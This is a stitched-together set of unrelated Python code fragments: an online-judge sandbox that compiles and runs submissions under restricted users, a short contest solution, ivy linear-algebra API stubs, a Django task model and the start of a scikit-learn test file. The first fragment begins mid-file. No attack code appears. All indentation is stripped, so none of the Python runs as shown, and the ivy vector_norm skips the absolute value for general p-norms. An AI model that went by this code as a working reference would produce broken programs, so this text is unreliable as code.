for root, _, files in os.walk(self.res_path):
for filename in files:
path_set.add(os.path.abspath(os.path.join(root, filename)))
path_list = list(path_set)
proc_list = []
with StackContext(Privilege.fileaccess):
for idx in range(0, len(path_list), 16):
proc_list.append(process.Subprocess(
['./Prefetch.py'] + path_list[idx:idx + 16],
stdout=process.Subprocess.STREAM))
for proc in proc_list:
yield proc.stdout.read_bytes(2)
@gen.coroutine
def start(self):
'''Start the challenge.
Returns:
dict: Challenge result.
'''
cache_hash = None
cache_gid = None
# Check if special judge needs to rebuild.
if self.judge_typ in ['ioredir']:
hashproc = process.Subprocess( \
['./HashDir.py', self.res_path + '/check'], \
stdout=process.Subprocess.STREAM)
dirhash = yield hashproc.stdout.read_until(b'\n')
dirhash = int(dirhash.decode('utf-8').rstrip('\n'), 16)
ret = StdChal.build_cache_find(self.res_path)
if ret is not None and ret[0] == dirhash:
cache_hash, cache_gid = ret
judge_ioredir = IORedirJudge('container/standard', \
'/cache/%x'%cache_hash)
else:
cache_hash = dirhash
_, cache_gid = StdChal.get_standard_ugid()
build_ugid = StdChal.get_standard_ugid()
build_relpath = '/cache/%x'%cache_hash
build_path = 'container/standard' + build_relpath
judge_ioredir = IORedirJudge('container/standard', \
build_relpath)
if not (yield judge_ioredir.build(build_ugid, self.res_path)):
return [(0, 0, STATUS_ERR)] * len(self.test_list), ''
FileUtils.setperm(build_path, \
Privilege.JUDGE_UID, cache_gid, umask=0o750)
with StackContext(Privilege.fullaccess):
os.chmod(build_path, 0o750)
StdChal.build_cache_update(self.res_path, cache_hash, cache_gid)
print('StdChal %d built checker %x'%(self.chal_id, cache_hash))
StdChal.build_cache_incref(cache_hash)
print('StdChal %d started'%self.chal_id)
# Create challenge environment.
self.chal_path = 'container/standard/home/%d'%self.uniqid
with StackContext(Privilege.fileaccess):
os.mkdir(self.chal_path, mode=0o771)
try:
yield self.prefetch()
print('StdChal %d prefetched'%self.chal_id)
if self.comp_typ in ['g++', 'clang++']:
ret, verdict = yield self.comp_cxx()
elif self.comp_typ == 'makefile':
ret, verdict = yield self.comp_make()
elif self.comp_typ == 'python3':
ret, verdict = yield self.comp_python()
if ret != PyExt.DETECT_NONE:
return [(0, 0, STATUS_CE, verdict)] * len(self.test_list)
print('StdChal %d compiled'%self.chal_id)
# Prepare test arguments
if self.comp_typ == 'python3':
exefile_path = self.chal_path \
+ '/compile/__pycache__/test.cpython-34.pyc'
exe_path = '/usr/bin/python3.5'
argv = ['./a.out']
envp = ['HOME=/', 'LANG=en_US.UTF-8']
else:
exefile_path = self.chal_path + '/compile/a.out'
exe_path = './a.out'
argv = []
envp = []
# Prepare judge
test_future = []
if self.judge_typ == 'diff':
for test in self.test_list:
test_future.append(self.judge_diff(
exefile_path,
exe_path, argv, envp,
test['in'], test['ans'],
test['timelimit'], test['memlimit']))
elif self.judge_typ == 'ioredir':
for test in self.test_list:
check_uid, _ = StdChal.get_standard_ugid()
test_uid, test_gid = StdChal.get_restrict_ugid()
test_future.append(judge_ioredir.judge( \
exefile_path, exe_path, argv, envp, \
(check_uid, cache_gid), \
(test_uid, test_gid), \
'/home/%d/run_%d'%(self.uniqid, test_uid), \
test, self.metadata))
# Emit tests
test_result = yield gen.multi(test_future)
ret_result = list()
for result in test_result:
test_pass, data, verdict = result
runtime, peakmem, error = data
status = STATUS_ERR
if error == PyExt.DETECT_NONE:
if test_pass is True:
status = STATUS_AC
else:
status = STATUS_WA
elif error == PyExt.DETECT_OOM:
status = STATUS_MLE
elif error == PyExt.DETECT_TIMEOUT \
or error == PyExt.DETECT_FORCETIMEOUT:
status = STATUS_TLE
elif error == PyExt.DETECT_EXITERR:
status = STATUS_RE
else:
status = STATUS_ERR
ret_result.append((runtime, peakmem, status, verdict))
return ret_result
finally:
if cache_hash is not None:
StdChal.build_cache_decref(cache_hash)
with StackContext(Privilege.fileaccess):
shutil.rmtree(self.chal_path)
print('StdChal %d done'%self.chal_id)
@concurrent.return_future
def comp_cxx(self, callback=None):
'''GCC, Clang compile.
Args:
callback (function): Callback of return_future.
Returns:
None
'''
def _started_cb(task_id):
'''Started callback.
Close unused file descriptors after the task is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal errpipe_fd
os.close(errpipe_fd)
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal compile_path
with StackContext(Privilege.fileaccess):
verfile = open(compile_path + '/verdict.txt', 'rb')
# To fix decoding error.
# Force convert the binary string to string temporarily.
verdict = ''.join(chr(c) for c in verfile.read(140))
verfile.close()
callback((stat['detect_error'], verdict))
compile_path = self.chal_path + '/compile'
with StackContext(Privilege.fileaccess):
os.mkdir(compile_path, mode=0o770)
shutil.copyfile(self.code_path, compile_path + '/test.cpp', \
follow_symlinks=False)
FileUtils.setperm(compile_path, self.compile_uid, self.compile_gid)
with StackContext(Privilege.fileaccess):
errpipe_fd = os.open(compile_path + '/verdict.txt', \
os.O_WRONLY | os.O_CREAT | os.O_CLOEXEC, mode=0o440)
if self.comp_typ == 'g++':
compiler = '/usr/bin/g++'
elif self.comp_typ == 'clang++':
compiler = '/usr/bin/clang++'
task_id = PyExt.create_task(compiler, \
[
'-O2',
'-std=c++14',
'-o', './a.out',
'./test.cpp',
], \
[
'PATH=/usr/bin:/bin',
'TMPDIR=/home/%d/compile'%self.uniqid,
], \
{
0: StdChal.null_fd,
1: StdChal.null_fd,
2: errpipe_fd,
}, \
'/home/%d/compile'%self.uniqid, 'container/standard', \
self.compile_uid, self.compile_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if task_id is None:
os.close(errpipe_fd)
callback((PyExt.DETECT_INTERNALERR, ''))
return
PyExt.start_task(task_id, _done_cb, _started_cb)
@concurrent.return_future
def comp_make(self, callback=None):
'''Makefile compile.
Args:
callback (function): Callback of return_future.
Returns:
None
'''
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
callback((stat['detect_error'], ''))
make_path = self.chal_path + '/compile'
FileUtils.copydir(self.res_path + '/make', make_path)
with StackContext(Privilege.fileaccess):
shutil.copyfile(self.code_path, make_path + '/main.cpp', \
follow_symlinks=False)
FileUtils.setperm(make_path, self.compile_uid, self.compile_gid)
with StackContext(Privilege.fullaccess):
os.chmod(make_path, mode=0o770)
task_id = PyExt.create_task('/usr/bin/make', \
[], \
[
'PATH=/usr/bin:/bin',
'TMPDIR=/home/%d/compile'%self.uniqid,
'OUT=./a.out',
], \
{
0: StdChal.null_fd,
1: StdChal.null_fd,
2: StdChal.null_fd,
}, \
'/home/%d/compile'%self.uniqid, 'container/standard', \
self.compile_uid, self.compile_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if task_id is None:
callback((PyExt.DETECT_INTERNALERR, ''))
else:
PyExt.start_task(task_id, _done_cb)
@concurrent.return_future
def comp_python(self, callback=None):
'''Python3.4 compile.
Args:
callback (function): Callback of return_future.
Returns:
None
'''
def _started_cb(task_id):
'''Started callback.
Close unused file descriptors after the task is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal errpipe_fd
os.close(errpipe_fd)
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal compile_path
with StackContext(Privilege.fileaccess):
verfile = open(compile_path + '/verdict.txt', 'rb')
# To fix decoding error.
# Force convert the binary string to string temporarily.
verdict = ''.join(chr(c) for c in verfile.read(140))
verfile.close()
callback((stat['detect_error'], verdict))
compile_path = self.chal_path + '/compile'
with StackContext(Privilege.fileaccess):
os.mkdir(compile_path, mode=0o770)
shutil.copyfile(self.code_path, compile_path + '/test.py', \
follow_symlinks=False)
FileUtils.setperm(compile_path, self.compile_uid, self.compile_gid)
with StackContext(Privilege.fileaccess):
errpipe_fd = os.open(compile_path + '/verdict.txt', \
os.O_WRONLY | os.O_CREAT | os.O_CLOEXEC, mode=0o440)
task_id = PyExt.create_task('/usr/bin/python3.5', \
[
'-m',
'py_compile',
'./test.py'
], \
[
'HOME=/home/%d/compile'%self.uniqid,
'LANG=en_US.UTF-8'
], \
{
0: StdChal.null_fd,
1: StdChal.null_fd,
2: errpipe_fd,
}, \
'/home/%d/compile'%self.uniqid, 'container/standard', \
self.compile_uid, self.compile_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if task_id is None:
os.close(errpipe_fd)
callback((PyExt.DETECT_INTERNALERR, ''))
return
PyExt.start_task(task_id, _done_cb, _started_cb)
@concurrent.return_future
def judge_diff(self, src_path, exe_path, argv, envp, in_path, ans_path, \
timelimit, memlimit, callback=None):
'''Diff judge.
Args:
src_path (string): Executable source path.
exe_path (string): Executable or interpreter path in the sandbox.
argv ([string]): List of arguments.
envp ([string]): List of environment variables.
in_path (string): Input file path.
ans_path (string): Answer file path.
timelimit (int): Timelimit.
memlimit (int): Memlimit.
callback (function): Callback of return_future.
Returns:
None
'''
def _started_cb(task_id):
'''Started callback.
Close unused file descriptors after the task is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal infile_fd
nonlocal outpipe_fd
os.close(infile_fd)
os.close(outpipe_fd[1])
IOLoop.instance().add_handler(outpipe_fd[0], _diff_out, \
IOLoop.READ | IOLoop.ERROR)
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal result_stat
nonlocal result_pass
result_stat = (stat['utime'], stat['peakmem'], stat['detect_error'])
if result_pass is not None:
callback((result_pass, result_stat, ''))
def _diff_out(evfd, events):
'''Diff the output of the task.
Args:
evfd (int): Event file descriptor.
events (int): Event flags.
Returns:
None
'''
nonlocal outpipe_fd
nonlocal ansfile
nonlocal result_stat
nonlocal result_pass
end_flag = False
if events & IOLoop.READ:
while True:
try:
data = os.read(outpipe_fd[0], 65536)
except BlockingIOError:
break
ansdata = ansfile.read(len(data))
if data != ansdata:
result_pass = False
end_flag = True
break
if len(ansdata) == 0:
if len(ansfile.read(1)) == 0:
result_pass = True
else:
result_pass = False
end_flag = True
break
if (events & IOLoop.ERROR) or end_flag:
if result_pass is None:
if len(ansfile.read(1)) == 0:
result_pass = True
else:
result_pass = False
IOLoop.instance().remove_handler(evfd)
os.close(outpipe_fd[0])
ansfile.close()
if result_stat is not None:
callback((result_pass, result_stat, ''))
judge_uid, judge_gid = StdChal.get_restrict_ugid()
# Prepare I/O and stat.
with StackContext(Privilege.fileaccess):
infile_fd = os.open(in_path, os.O_RDONLY | os.O_CLOEXEC)
ansfile = open(ans_path, 'rb')
outpipe_fd = os.pipe2(os.O_CLOEXEC)
fcntl.fcntl(outpipe_fd[0], fcntl.F_SETFL, os.O_NONBLOCK)
result_stat = None
result_pass = None
# Prepare judge environment.
with StackContext(Privilege.fileaccess):
judge_path = self.chal_path + '/run_%d'%judge_uid
os.mkdir(judge_path, mode=0o771)
shutil.copyfile(src_path, judge_path + '/a.out', \
follow_symlinks=False)
with StackContext(Privilege.fullaccess):
os.chown(judge_path + '/a.out', judge_uid, judge_gid)
os.chmod(judge_path + '/a.out', 0o500)
task_id = PyExt.create_task(exe_path, argv, envp, \
{
0: infile_fd,
1: outpipe_fd[1],
2: outpipe_fd[1],
}, \
'/home/%d/run_%d'%(self.uniqid, judge_uid), 'container/standard', \
judge_uid, judge_gid, timelimit, memlimit, \
PyExt.RESTRICT_LEVEL_HIGH)
if task_id is None:
os.close(infile_fd)
os.close(outpipe_fd[0])
os.close(outpipe_fd[1])
ansfile.close()
callback((False, (0, 0, PyExt.DETECT_INTERNALERR), ''))
else:
PyExt.start_task(task_id, _done_cb, _started_cb)
class IORedirJudge:
'''I/O redirect spcial judge.
Attributes:
container_path (string): Container path.
build_relpath (string): Relative build path.
build_path (string): Build path.
'''
def __init__(self, container_path, build_relpath):
'''Initialize.
Args:
container_path (string): Container path.
build_relpath (string): Relative build path.
'''
self.container_path = container_path
self.build_relpath = build_relpath
self.build_path = container_path + build_relpath
@concurrent.return_future
def build(self, build_ugid, res_path, callback=None):
'''Build environment.
Args:
build_ugid ((int, int)): Build UID/GID.
res_path (string): Resource path.
callback (function): Callback of return_future.
Returns:
None
'''
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
if stat['detect_error'] == PyExt.DETECT_NONE:
callback(True)
else:
callback(False)
build_uid, build_gid = build_ugid
# Prepare build environment.
FileUtils.copydir(res_path + '/check', self.build_path)
FileUtils.setperm(self.build_path, build_uid, build_gid)
with StackContext(Privilege.fullaccess):
os.chmod(self.build_path, mode=0o770)
with StackContext(Privilege.fileaccess):
if not os.path.isfile(self.build_path + '/build'):
callback(True)
return
# Make the build file executable.
with StackContext(Privilege.fullaccess):
os.chmod(self.build_path + '/build', mode=0o770)
# Build.
task_id = PyExt.create_task(self.build_relpath + '/build', \
[], \
[
'PATH=/usr/bin:/bin',
'TMPDIR=%s'%self.build_relpath,
'HOME=%s'%self.build_relpath,
'LANG=en_US.UTF-8'
], \
{
0: StdChal.null_fd,
1: StdChal.null_fd,
2: StdChal.null_fd,
}, \
self.build_relpath, 'container/standard', \
build_uid, build_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if task_id is None:
callback(False)
else:
PyExt.start_task(task_id, _done_cb)
@concurrent.return_future
def judge(self, src_path, exe_relpath, argv, envp, check_ugid, test_ugid, \
test_relpath, test_param, metadata, callback=None):
'''I/O redirect special judge.
Args:
src_path (string): Executable source path.
exe_relpath (string): Executable or interpreter path in the sandbox.
argv ([string]): List of arguments.
envp ([string]): List of environment variables.
check_ugid (int, int): Check UID/GID.
test_ugid (int, int): Test UID/GID.
test_relpath (string): Test relative path.
test_param (dict): Test parameters.
metadata (dict): Metadata.
callback (function): Callback of return_future.
Returns:
None
'''
def _check_started_cb(task_id):
'''Check started callback.
Close unused file descriptors after the check is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal inpipe_fd
nonlocal outpipe_fd
nonlocal ansfile_fd
nonlocal check_infile_fd
os.close(inpipe_fd[1])
os.close(outpipe_fd[0])
if ansfile_fd is not None:
os.close(ansfile_fd)
if check_infile_fd is not None:
os.close(check_infile_fd)
def _test_started_cb(task_id):
'''Test started callback.
Close unused file descriptors after the test is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal inpipe_fd
nonlocal outpipe_fd
nonlocal outfile_fd
nonlocal test_infile_fd
os.close(inpipe_fd[0])
os.close(outpipe_fd[1])
os.close(outfile_fd)
if test_infile_fd is not None:
os.close(test_infile_fd)
def _done_cb():
'''Done callback.'''
nonlocal result_stat
nonlocal result_pass
nonlocal verdict_path
if result_pass is not None and result_stat is not None:
with StackContext(Privilege.fileaccess):
verfile = open(verdict_path, 'r')
verdict = verfile.read(140)
verfile.close()
callback((result_pass, result_stat, verdict))
return
def _check_done_cb(task_id, stat):
'''Check done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal result_pass
if stat['detect_error'] == PyExt.DETECT_NONE:
result_pass = True
else:
result_pass = False
_done_cb()
def _test_done_cb(task_id, stat):
'''Test done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal result_stat
result_stat = (stat['utime'], stat['peakmem'], stat['detect_error'])
_done_cb()
result_stat = None
result_pass = None
in_path = test_param['in']
ans_path = test_param['ans']
timelimit = test_param['timelimit']
memlimit = test_param['memlimit']
check_uid, check_gid = check_ugid
test_uid, test_gid = test_ugid
test_path = self.container_path + test_relpath
output_relpath = test_relpath + '/output.txt'
output_path = self.container_path + output_relpath
verdict_relpath = test_relpath + '/verdict.txt'
verdict_path = self.container_path + verdict_relpath
# Prepare test environment.
with StackContext(Privilege.fileaccess):
os.mkdir(test_path, mode=0o771)
shutil.copyfile(src_path, test_path + '/a.out', \
follow_symlinks=False)
with StackContext(Privilege.fullaccess):
os.chown(test_path + '/a.out', test_uid, test_gid)
os.chmod(test_path + '/a.out', 0o500)
# Prepare I/O.
with StackContext(Privilege.fileaccess):
try:
check_infile_fd = os.open(in_path, os.O_RDONLY | os.O_CLOEXEC)
test_infile_fd = os.open(in_path, os.O_RDONLY | os.O_CLOEXEC)
except (FileNotFoundError, TypeError):
check_infile_fd = None
test_infile_fd = None
try:
ansfile_fd = os.open(ans_path, os.O_RDONLY | os.O_CLOEXEC)
except (FileNotFoundError, TypeError):
ansfile_fd = None
outfile_fd = os.open(output_path, \
os.O_WRONLY | os.O_CREAT | os.O_CLOEXEC, mode=0o400)
os.close(os.open(verdict_path,
os.O_CREAT | os.O_CLOEXEC, mode=0o640))
with StackContext(Privilege.fullaccess):
os.chown(output_path, check_uid, check_gid)
os.chown(verdict_path, check_uid, check_gid)
inpipe_fd = os.pipe2(os.O_CLOEXEC)
outpipe_fd = os.pipe2(os.O_CLOEXEC)
# Set file descriptor mapping.
check_fdmap = {
0: StdChal.null_fd,
1: StdChal.null_fd,
2: StdChal.null_fd,
}
test_fdmap = {
0: StdChal.null_fd,
1: StdChal.null_fd,
2: StdChal.null_fd,
}
if check_infile_fd is not None:
check_fdmap[metadata['redir_check']['testin']] = check_infile_fd
if ansfile_fd is not None:
check_fdmap[metadata['redir_check']['ansin']] = ansfile_fd
check_fdmap[metadata['redir_check']['pipein']] = inpipe_fd[1]
check_fdmap[metadata['redir_check']['pipeout']] = outpipe_fd[0]
try:
del check_fdmap[-1]
except KeyError:
pass
if test_infile_fd is not None:
test_fdmap[metadata['redir_test']['testin']] = test_infile_fd
test_fdmap[metadata['redir_test']['testout']] = outfile_fd
test_fdmap[metadata['redir_test']['pipein']] = inpipe_fd[0]
test_fdmap[metadata['redir_test']['pipeout']] = outpipe_fd[1]
try:
del test_fdmap[-1]
except KeyError:
pass
check_task_id = PyExt.create_task(self.build_relpath + '/check', \
[], \
[
'PATH=/usr/bin:/bin',
'HOME=%s'%self.build_relpath,
'LANG=en_US.UTF-8',
'OUTPUT=%s'%output_relpath,
'VERDICT=%s'%verdict_relpath,
], \
check_fdmap, \
self.build_relpath, self.container_path, \
check_uid, check_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if check_task_id is None:
callback((False, (0, 0, PyExt.DETECT_INTERNALERR), ''))
return
PyExt.start_task(check_task_id, _check_done_cb, _check_started_cb)
test_task_id = PyExt.create_task(exe_relpath, argv, envp, \
test_fdmap, \
test_relpath, self.container_path, \
test_uid, test_gid, timelimit, memlimit, \
PyExt.RESTRICT_LEVEL_HIGH)
if test_task_id is None:
callback((False, (0, 0, PyExt.DETECT_INTERNALERR), ''))
return
PyExt.start_task(test_task_id, _test_done_cb, _test_started_cb)
|
n, m = map(int, input().split())
l = list(map(int, input().split()))
l.sort()
mini = l[m-1] - l[0]
for i in range(m-n+1):
mini = min(mini, l[i+n-1]-l[i])
print(mini)
|
# global
from typing import Union, Optional, Tuple, Literal
from collections import namedtuple
# local
import ivy
from ivy.framework_handler import current_framework as _cur_framework
inf = float('inf')
# Array API Standard #
# -------------------#
def matrix_transpose(x: Union[ivy.Array, ivy.NativeArray])\
-> ivy.Array:
"""
Transposes a matrix (or a stack of matrices) ``x``.
Parameters
----------
x: array
input array having shape ``(..., M, N)`` and whose innermost two dimensions form ``MxN`` matrices.
Returns
-------
out: array
an array containing the transpose for each matrix and having shape ``(..., N, M)``. The returned array must have the same data type as ``x``.
"""
return _cur_framework(x).matrix_transpose(x)
# noinspection PyShadowingBuiltins
def vector_norm(x: Union[ivy.Array, ivy.NativeArray],
axis: Optional[Union[int, Tuple[int]]] = None,
keepdims: bool = False,
ord: Union[int, float, Literal[inf, -inf]] = 2)\
-> ivy.Array:
"""
Computes the vector norm of a vector (or batch of vectors) ``x``.
Parameters
----------
x:
input array. Should have a floating-point data type.
axis:
If an integer, ``axis`` specifies the axis (dimension) along which to compute vector norms. If an n-tuple, ``axis`` specifies the axes (dimensions) along which to compute batched vector norms. If ``None``, the vector norm must be computed over all array values (i.e., equivalent to computing the vector norm of a flattened array). Negative indices must be supported. Default: ``None``.
keepdims:
If ``True``, the axes (dimensions) specified by ``axis`` must be included in the result as singleton dimensions, and, accordingly, the result must be compatible with the input array (see :ref:`broadcasting`). Otherwise, if ``False``, the axes (dimensions) specified by ``axis`` must not be included in the result. Default: ``False``.
ord:
order of the norm. The following mathematical norms must be supported:
+------------------+----------------------------+
| ord | description |
+==================+============================+
| 1 | L1-norm (Manhattan) |
+------------------+----------------------------+
| 2 | L2-norm (Euclidean) |
+------------------+----------------------------+
| inf | infinity norm |
+------------------+----------------------------+
| (int,float >= 1) | p-norm |
+------------------+----------------------------+
The following non-mathematical "norms" must be supported:
+------------------+--------------------------------+
| ord | description |
+==================+================================+
| 0 | sum(a != 0) |
+------------------+--------------------------------+
| -1 | 1./sum(1./abs(a)) |
+------------------+--------------------------------+
| -2 | 1./sqrt(sum(1./abs(a)\*\*2)) |
+------------------+--------------------------------+
| -inf | min(abs(a)) |
+------------------+--------------------------------+
| (int,float < 1) | sum(abs(a)\*\*ord)\*\*(1./ord) |
+------------------+--------------------------------+
Default: ``2``.
Returns
-------
out:
an array containing the vector norms. If ``axis`` is ``None``, the returned array must be a zero-dimensional array containing a vector norm. If ``axis`` is a scalar value (``int`` or ``float``), the returned array must have a rank which is one less than the rank of ``x``. If ``axis`` is a ``n``-tuple, the returned array must have a rank which is ``n`` less than the rank of ``x``. The returned array must have a floating-point data type determined by :ref:`type-promotion`.
"""
if ord == -float('inf'):
return ivy.reduce_min(ivy.abs(x), axis, keepdims)
elif ord == float('inf'):
return ivy.reduce_max(ivy.abs(x), axis, keepdims)
elif ord == 0:
return ivy.reduce_sum(ivy.cast(x != 0, 'float32'), axis, keepdims)
x_raised = x ** ord
return ivy.reduce_sum(x_raised, axis, keepdims) ** (1/ord)
def svd(x:Union[ivy.Array,ivy.NativeArray],full_matrices: bool = True)->Union[ivy.Array, Tuple[ivy.Array,...]]:
"""
Singular Value Decomposition.
When x is a 2D array, it is factorized as u @ numpy.diag(s) @ vh = (u * s) @ vh, where u and vh are 2D unitary
arrays and s is a 1D array of a’s singular values. When x is higher-dimensional, SVD is applied in batched mode.
:param x: Input array with number of dimensions >= 2.
:type x: array
:return:
u -> { (…, M, M), (…, M, K) } array \n
Unitary array(s). The first (number of dims - 2) dimensions have the same size as those of the input a.
The size of the last two dimensions depends on the value of full_matrices.
s -> (…, K) array \n
Vector(s) with the singular values, within each vector sorted in descending ord.
The first (number of dims - 2) dimensions have the same size as those of the input a.
vh -> { (…, N, N), (…, K, N) } array \n
Unitary array(s). The first (number of dims - 2) dimensions have the same size as those of the input a.
The size of the last two dimensions depends on the value of full_matrices.
"""
return _cur_framework(x).svd(x,full_matrices)
def diagonal(x: ivy.Array,
offset: int = 0,
axis1: int = -2,
axis2: int = -1) -> ivy.Array:
"""
Returns the specified diagonals of a matrix (or a stack of matrices) ``x``.
Parameters
----------
x:
input array having shape ``(..., M, N)`` and whose innermost two dimensions form ``MxN`` matrices.
offset:
offset specifying the off-diagonal relative to the main diagonal.
- ``offset = 0``: the main diagonal.
- ``offset > 0``: off-diagonal above the main diagonal.
- ``offset < 0``: off-diagonal below the main diagonal.
Default: `0`.
axis1:
axis to be used as the first axis of the 2-D sub-arrays from which the diagonals should be taken.
Defaults to first axis (0).
axis2:
axis to be used as the second axis of the 2-D sub-arrays from which the diagonals should be taken.
Defaults to second axis (1).
Returns
-------
out:
an array containing the diagonals and whose shape is determined by removing the last two dimensions and appending a dimension equal to the size of the resulting diagonals. The returned array must have the same data type as ``x``.
"""
return _cur_framework(x).diagonal(x, offset, axis1=axis1, axis2=axis2)
def inv(x):
"""
Computes the (multiplicative) inverse of x matrix.
Given a square matrix x, returns the matrix x_inv satisfying dot(x, x_inv) = dot(x_inv, x) = eye(x.shape[0]).
:param x: Matrix to be inverted.
:type x: array
:return: (Multiplicative) inverse of the matrix x.
"""
return _cur_framework(x).inv(x)
def pinv(x):
"""
Computes the pseudo inverse of x matrix.
:param x: Matrix to be pseudo inverted.
:type x: array
:return: pseudo inverse of the matrix x.
"""
return _cur_framework(x).pinv(x)
def qr(x: ivy.Array,
mode: str = 'reduced') -> namedtuple('qr', ['Q', 'R']):
"""
Returns the qr decomposition x = QR of a full column rank matrix (or a stack of matrices), where Q is an orthonormal matrix (or a stack of matrices) and R is an upper-triangular matrix (or a stack of matrices).
Parameters
----------
x:
input array having shape (..., M, N) and whose innermost two dimensions form MxN matrices of rank N. Should have a floating-point data type.
mode:
decomposition mode. Should be one of the following modes:
- 'reduced': compute only the leading K columns of q, such that q and r have dimensions (..., M, K) and (..., K, N), respectively, and where K = min(M, N).
- 'complete': compute q and r with dimensions (..., M, M) and (..., M, N), respectively.
Default: 'reduced'.
Returns
-------
out:
a namedtuple (Q, R) whose
- first element must have the field name Q and must be an array whose shape depends on the value of mode and contain matrices with orthonormal columns. If mode is 'complete', the array must have shape (..., M, M). If mode is 'reduced', the array must have shape (..., M, K), where K = min(M, N). The first x.ndim-2 dimensions must have the same size as those of the input array x.
- second element must have the field name R and must be an array whose shape depends on the value of mode and contain upper-triangular matrices. If mode is 'complete', the array must have shape (..., M, N). If mode is 'reduced', the array must have shape (..., K, N), where K = min(M, N). The first x.ndim-2 dimensions must have the same size as those of the input x.
"""
return _cur_framework(x).qr(x, mode)
def matmul(x1: Union[ivy.Array, ivy.NativeArray],
x2: Union[ivy.Array, ivy.NativeArray]) -> ivy.Array:
"""
Computes the matrix product.
Parameters
----------
x1:
x1 (array) – first input array. Should have a numeric data type. Must have at least one dimension.
x2:
x2 (array) – second input array. Should have a numeric data type. Must have at least one dimension.
Returns
-------
out(array):
if both x1 and x2 are one-dimensional arrays having shape (N,), a zero-dimensional array containing the inner product as its only element.
if x1 is a two-dimensional array having shape (M, K) and x2 is a two-dimensional array having shape (K, N), a two-dimensional array containing the conventional matrix product and having shape (M, N).
if x1 is a one-dimensional array having shape (K,) and x2 is an array having shape (..., K, N), an array having shape (..., N) (i.e., prepended dimensions during vector-to-matrix promotion must be removed) and containing the conventional matrix product.
if x1 is an array having shape (..., M, K) and x2 is a one-dimensional array having shape (K,), an array having shape (..., M) (i.e., appended dimensions during vector-to-matrix promotion must be removed) and containing the conventional matrix product.
if x1 is a two-dimensional array having shape (M, K) and x2 is an array having shape (..., K, N), an array having shape (..., M, N) and containing the conventional matrix product for each stacked matrix.
if x1 is an array having shape (..., M, K) and x2 is a two-dimensional array having shape (K, N), an array having shape (..., M, N) and containing the conventional matrix product for each stacked matrix.
if either x1 or x2 has more than two dimensions, an array having a shape determined by Broadcasting shape(x1)[:-2] against shape(x2)[:-2] and containing the conventional matrix product for each stacked matrix.
Raises
------
if either x1 or x2 is a zero-dimensional array.
if x1 is a one-dimensional array having shape (K,), x2 is a one-dimensional array having shape (L,), and K != L.
if x1 is a one-dimensional array having shape (K,), x2 is an array having shape (..., L, N), and K != L.
if x1 is an array having shape (..., M, K), x2 is a one-dimensional array having shape (L,), and K != L.
if x1 is an array having shape (..., M, K), x2 is an array having shape (..., L, N), and K != L.
"""
return _cur_framework(x1).matmul(x1, x2)
def slodget(x: Union[ivy.Array, ivy.NativeArray],) \
-> ivy.Array:
"""
Computes the sign and natural logarithm of the determinant of an array.
Parameters
----------
x:
This is a 2D array, and it has to be square
Return
----------
Out:
This function returns two values -
sign:
A number representing the sign of the determinant.
logdet:
The natural log of the absolute value of the determinant.
"""
return _cur_framework(x).slodget(x)
def svdvals(x: Union[ivy.Array, ivy.NativeArray],) \
-> ivy.Array:
"""
Returns the singular values of a matrix (or a stack of matrices) ``x``.
Parameters
----------
x:
input array having shape ``(..., M, N)`` and whose innermost two dimensions form ``MxN`` matrices.
Return
----------
Out:
array with shape ``(..., K)`` that contains the vector(s) of singular values of length ``K``, where K = min(M, N).
The values are sorted in descending order by magnitude.
"""
return _cur_framework(x).svdvals(x)
def trace(x: ivy.Array,
offset: int = 0)\
-> ivy.Array:
"""
Computes the sum of the diagonal of an array.
Parameters
----------
x:
This is an array.
Return
----------
Out:
This function returns two values -
sum:
The sum of the diagonals along an axis.
"""
return _cur_framework(x).trace(x, offset)
# Extra #
# ------#
|
from django.contrib.postgres.fields import JSONField
from django.db import models
from surfsara.models.permission import Permission
class Task(models.Model):
RUNNING = "running"
SUCCESS = "success"
ERROR = "error"
OUTPUT_RELEASED = "output_released"
RELEASE_REJECTED = "release_rejected"
TASK_STATES = (
(RUNNING, "Running"),
(SUCCESS, "Success"),
(ERROR, "Error"),
(OUTPUT_RELEASED, "Output Released"),
(RELEASE_REJECTED, "Release Rejected"),
)
id = models.AutoField(primary_key=True)
state = models.CharField(max_length=255, choices=TASK_STATES)
progress_state = JSONField(null=True)
author_email = models.EmailField()
approver_email = models.EmailField()
algorithm = models.TextField()
algorithm_storage = models.TextField()
dataset = models.TextField()
dataset_storage = models.TextField()
output = models.TextField(null=True)
review_output = models.BooleanField(default=True)
permission = models.ForeignKey(Permission, null=True, on_delete=models.SET_NULL)
registered_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
|
# Author: Tom Dupre la Tour
# Joan Massich <mailsik@gmail.com>
#
# License: BSD 3 clause
import numpy as np
import pytest
import scipy.sparse as sp
from numpy.testing import assert_array_equal
from sklearn.utils._seq_dataset import (
ArrayDataset32, ArrayDataset64, CSRDataset32, CSRDataset64)
from sklearn.datasets import load_iris
from sklearn.utils._testing import assert_allclose
iris = load_iris()
X64 = iris.data.astype(np.float64)
y64 = iris.target.astype(np.float64)
X_csr64 = sp.csr_matrix(X64)
